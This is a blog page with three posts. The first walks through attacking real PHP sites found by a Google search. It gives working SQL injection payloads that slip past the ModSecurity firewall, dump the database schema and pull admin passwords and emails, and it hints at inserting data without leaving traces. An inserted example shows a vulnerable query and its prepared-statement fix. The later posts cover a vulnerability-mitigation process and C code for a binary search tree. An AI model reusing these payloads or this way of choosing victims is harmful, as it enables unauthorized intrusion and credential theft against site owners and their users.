Tuesday, April 4, 2017

Hacking PHP Website using SQL Injection

Hi Guys,

Recently, I tried my hand at performing SQL injection on PHP websites.

So let's talk about SQL injection first.

SQL injection (SQLi) is an application security weakness that allows attackers to control an application’s database – letting them access or delete data, change an application’s data-driven behavior, and do other undesirable things – by tricking the application into sending unexpected SQL commands.
SQL injection weaknesses occur when an application uses untrusted data, such as data entered into web form fields, as part of a database query. When an application fails to properly sanitize this untrusted data before adding it to a SQL query, an attacker can include their own SQL commands which the database will execute. Such SQLi vulnerabilities are easy to prevent, yet SQLi remains a leading web application risk, and many organizations remain vulnerable to potentially damaging data breaches resulting from SQL injection.

If you are not familiar with SQL, please practice SQL here, and if you are not familiar with basic SQL injection, practice here.

But what many websites fail to mention is the possibility of a Web Application Firewall (WAF). A WAF is the first level of filtering: it applies filtering rules to HTML content and HTTP/HTTPS requests, and if the HTML content or network request contains script tags, SQL keywords or other unwanted strings, the request is rejected at that first level by the WAF before it ever reaches the application. For more on WAFs, please refer to https://www.owasp.org/index.php/Web_Application_Firewall

In our case, because we will be playing with the GET request of a web page a lot, bypassing the WAF is extremely important.

Step 1: how to choose a victim?
  • Go to www.google.com and type .php?id=1
    The reason for this search is to find potential victims.
  • Now, out of those thousands, how do you choose a victim? Simply by checking whether an SQL exception is left unhandled by the site at the front end, and to do that simply add a ' at the end of the request. For example:
    1. link1
    2. link2
  • I have done my homework on link2, so I'll pick this as my victim, because the error here is bloody clear, which is great for troubleshooting..!! :D
  • So the most important concept we are exploiting here is the freedom to use stacked commands, which is allowed in MySQL, and because the server runs on MySQL this will be our ideal target.
  • Let's try to modify the link so that it looks like this: <DOMAIN>/research.php?id%3D-1%20and%20select%20*%20from%20admin and observe that there is an exception given to us, but it's not from MySQL, it's from ModSecurity (https://modsecurity.org/), which is an open source WAF.
  • Now, how do we bypass it? I found that ModSecurity was not only able to identify SQL strings such as union, select, from etc., but it was also able to identify the same if they were hexed. So what do I do now? I found that you can use PHP comment tags in between to confuse ModSecurity into believing that the string coming to it is safe to execute. BOOM..!!
  • Now try this. To list all tables in our DB here, we can use <DOMAIN>/....php?id=.1+/*!50000union*/+select+concat/**/(0x3c62723e496e6a6563746564204279204a41434b3c62723e56657273696f6e203a3a20,version(),0x3c62723e4461746162617365203a3a20,database(),0x3c62723e55736572203a3a20,user(),(SELECT concat/**/(@x:=0x00,if((SELECT count(*) from /*!00000information_schema.columns*/ where table_schema=database() and @x:=concat/**/(@x,0x3c62723e,database(),0x203a3a20,table_name,0x203a3a20,column_name)),0x00,0x00),@x))),22222,33333,444444--+-
    It is worth first understanding what this command is doing: UNION is the best way to execute a custom query, keeping in mind that the number of columns must match the preceding query. Awesome, now you can see all its tables (check out the screenshot below).
  • Now that you have the information about the whole DB, let's start digging data out of it. So, I tried to read from the admin table, where I can see the username, password, email_address, first name and last name. How do you do that? Just tweak the above query to match your requirements; in my case it is
    <DOMAIN>/.....php?id=.1+/*!50000union*/+%28/*!50000select*/%20password%20,admin_fname,admin_lname,%20email_address%20/*!50000from*/%20admin%29 and look what I got.
  • This is the encrypted password stored in the database... WOW..!! :D Well, I know MySQL passwords are not passwords but hashes and are hard to decrypt, but if you get to know a technique, do let me know :)
  • Now, people usually end up INSERTing into the DB, which can be bad because they would leave a rather more noticeable trace; I'm sure you'll find a workaround for that :D
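The pattern the walkthrough above exploits (a GET id parameter glued straight into a SELECT) next to the prepared-statement version that removes the hole, as an added example that is not code from the original post or from any site it describes. It assumes an in-memory SQLite database via PDO in place of MySQL, and the research and admin tables with their rows are constructed sample data.

```php
<?php
// Added example (not from the original post). An in-memory SQLite database
// via PDO stands in for MySQL; the tables and rows below are constructed data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE research (id INTEGER PRIMARY KEY, title TEXT)");
$db->exec("INSERT INTO research (id, title) VALUES (1, 'Public paper'), (2, 'Second paper')");
$db->exec("CREATE TABLE admin (username TEXT, password TEXT)");
$db->exec("INSERT INTO admin (username, password) VALUES ('admin', 'constructed-hash')");

// Vulnerable: $id is interpolated into the SQL text, so whatever the WAF lets
// through is parsed as SQL. A stray quote produces the unhandled error the post
// looks for, and a UNION returns rows from a table the page never meant to show.
function lookupVulnerable(PDO $db, string $id): array
{
    $sql = "SELECT id, title FROM research WHERE id = " . $id;
    return $db->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Hardened: the id is bound as a parameter. Query text and value reach the
// database separately, so the value is compared, never parsed as SQL, and the
// WAF becomes defence in depth rather than the only barrier.
function lookupSafe(PDO $db, string $id): array
{
    $stmt = $db->prepare("SELECT id, title FROM research WHERE id = :id");
    $stmt->execute([':id' => $id]);
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

$inputs = [
    '1',                                              // a normal request
    "1'",                                             // the post's quote probe
    "-1 union select username, password from admin",  // the post's UNION trick
];
foreach ($inputs as $input) {
    echo "input: $input\n";
    try {
        echo "  vulnerable: " . json_encode(lookupVulnerable($db, $input)) . "\n";
    } catch (PDOException $e) {
        echo "  vulnerable: SQL error (" . $e->getMessage() . ")\n";
    }
    // The hardened lookup returns the matching row for '1' and an empty
    // result for both tainted inputs; it never errors and never leaks admin.
    echo "  safe:       " . json_encode(lookupSafe($db, $input)) . "\n";
}
```

Run it with the php CLI (the pdo_sqlite extension is needed); the vulnerable function errors on the quote probe and returns the admin row for the UNION input, while the safe one returns [] for both.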
Please comment and share if you found this helpful :)


Sunday, February 12, 2017

Must Have Data-Driven Software Defense Strategy to Identify Vulnerable Code

“Security mitigation planning is the process of developing options and actions to enhance experience and reduce threats to the project objectives.” Although security bulletins and exploitability indexes help customers assess potential risks, these reactive measures are not enough. Every security mitigation shipped carries an investment that is meant to raise the cost of exploiting the same vulnerability again. Hence, root cause analysis of a vulnerability plays a vital role in defining a security mitigation, and this is where data analytics on historical vulnerability reports and the evaluation of exploits, PoCs and zero days become critical.
In this talk I will elaborate on the Multi-Level Exploit Analysis process that organizations must have and use before planning any security mitigation in application code or custom memory managers. These strategies are well thought out and are a manifestation of suggestions from leading organizations such as Microsoft. Incorporating this strategy is a great value addition, and the following actions can help organizations and individuals significantly reduce the risk they face from zero day exploits.

Keywords:  Multi-Level Exploit Analysis, Vulnerability Analysis, Data Analytics on Security Mitigation, Data-Driven Strategy, Mitigation Progress Monitoring
Must Have Data-Driven Software Defense Strategy to Identify Vulnerable Code:
Security is always relative to the information and services being protected, the skills and resources of adversaries, and the costs of potential assurance remedies via mitigation techniques. In the modern era, where the profit motive underlies most malicious exploitation activity, effective risk management becomes fundamental. Although 99% of bugs are caught using functional and black-box testing and advanced techniques such as fuzzing and static code analysis, it is the remaining 1% that are difficult for testers to discover and extremely valuable for exploits.


Multi-Dimensional Exploit Analysis:

At Black Hat USA 2016, Microsoft presented its Data-Driven Software Defense process, giving an overview of the strategy organizations should use to identify root causes and perform data analytics on historical data.


Security Mitigation Planning, Implementation and Progress Monitoring:

Security mitigation planning, implementation, and monitoring is represented below in fig. i as a flow diagram; it is a manifestation of the Data-Driven Software Defense process.

a. Exploit Identification:
Exploit identification is extremely important and involves collecting:
1. Crashes reported and collected by platforms using:
a. Microsoft WER (Windows Error Reporting)
b. Apple BugReport
c. Mozilla Crash-Stats
d. Google Error Reporting
2. Threat intelligence reports from security partners:
a. Responsibly disclosed security incidents and research
b. Zero day exploits
c. Open source / social media

b. Exploit Impact:
Exploit impact is the crucial step where we perform the following activities:
1. Bucketizing similar crashes to form a list of unique crash stacks, with the number of crashes observed for each in the live application, so that duplicates are removed.

2. Collating responsibly disclosed security incidents, research and zero day exploits to assign each a vulnerability type and criticality.

Now that we have the raw data collated for real-time crashes observed on the application and historical data on responsibly disclosed security incidents, we can work on making sense of this data. The next steps can be:
1. After manual evaluation and filtering, the list of all vulnerable APIs reported can be collated into one table, with the associated exploit_id and bucket_id(s) defining the susceptibility of each API. Crashing_api_table:
Possible scenarios can be summarized into these three primary cases, shown in Figures i, ii and iii:

Figure (i): describes the point of intersection between a bucket crash stack and an exploit crash stack trace.

Figure (ii): describes the point of deviation between a bucket crash stack and an exploit crash stack trace.

Figure (iii): describes the point of conjunction between a bucket crash stack and an exploit crash stack trace.

c. Exploit Criticality:
The criticality of every security incident reported depends on the type of vulnerability and the area impacted by it, unless it is a zero day, which needs to be fixed and shipped immediately. Now that we have the health status of every crashing API for every mitigation, the decisions become easier with

Priority = Function(Sum_of_all_priorities(exploit_id(s)), crash_count(bucket_id(s))) and
the vulnerability popularity trend in the market, shared as research by threat intelligence organizations.
d. Security Mitigation:
Mitigation depends on which strategy to follow; it is an organizational decision how to tackle a type of exploit and which measures can be introduced to increase the cost of an attack.

e. Mitigation Impact & Tracking:

For every mitigation shipped into the market there is an associated investment intended to increase the cost of generating another exploit in the same code using the advanced approaches described earlier. The impact of a mitigation is therefore vital for evaluating the quality of the mitigation shipped. Measuring that impact starts internally, when all the reported security incidents become inoperable, and continues by tracking new crashes and incidents reported for an api_id inside Crashing_api_table for the latest build (build_id) in the market.

Monday, February 17, 2014

C: Create Binary Search Tree from an Array

Hi, today we will create a Binary Search Tree, which is nothing but a sorted binary tree. The functions used here are:

  1. createTree, which walks the array (given a reference to the array, its length and the root of the tree) and inserts one node per element
  2. makeNode, which creates a node for the value at the current array index and descends the tree until the BST ordering condition tells it where to attach the node
  3. printTree, which prints the tree with an in-order traversal, so the values come out sorted
#include <stdio.h>
#include <stdlib.h>

struct BST
{
    struct BST* left;
    int info;
    struct BST* right;
};

void createTree(struct BST*, int*, int);
void makeNode(struct BST*, int*);
void printTree(struct BST*);

int main()
{
    int arr[100] = {6,5,3,7,9,4,1,10};
    /* The first element becomes the root; the remaining seven are inserted. */
    struct BST* root = (struct BST*) malloc(sizeof(struct BST));
    root->info = arr[0];
    root->left = root->right = NULL;
    createTree(root, arr + 1, 7);
    printTree(root);   /* in-order traversal prints:  1  3  4  5  6  7  9  10 */
    printf("\n");
    return 0;
}

/* Walk the array, inserting one node per element. */
void createTree(struct BST* root, int* arr_ref, int arr_len)
{
    struct BST* temproot = root;
    while(arr_len > 0)
    {
        makeNode(temproot, arr_ref);
        arr_ref++;
        arr_len--;
    }
}

/* Descend from root and attach a new node for *arr_ref at its BST position:
   smaller values go to the left subtree, equal or larger values to the right. */
void makeNode(struct BST* root, int* arr_ref)
{
    struct BST* temp = root;
    if(temp->info > *arr_ref)
    {
        if(temp->left == NULL)
        {
            struct BST* newnode = (struct BST*) malloc(sizeof(struct BST));
            newnode->info = *arr_ref;
            newnode->left = newnode->right = NULL;
            temp->left = newnode;
        }
        else
            makeNode(temp->left, arr_ref);   /* keep descending on the left */
    }
    else
    {
        if(temp->right == NULL)
        {
            struct BST* newnode = (struct BST*) malloc(sizeof(struct BST));
            newnode->info = *arr_ref;
            newnode->left = newnode->right = NULL;
            temp->right = newnode;
        }
        else
            makeNode(temp->right, arr_ref);  /* keep descending on the right */
    }
}

/* In-order traversal: left subtree, the node itself, then the right subtree. */
void printTree(struct BST* root)
{
    struct BST* temp = root;
    if(temp == NULL)
        return;
    printTree(temp->left);
    printf(" %d ", temp->info);
    printTree(temp->right);
}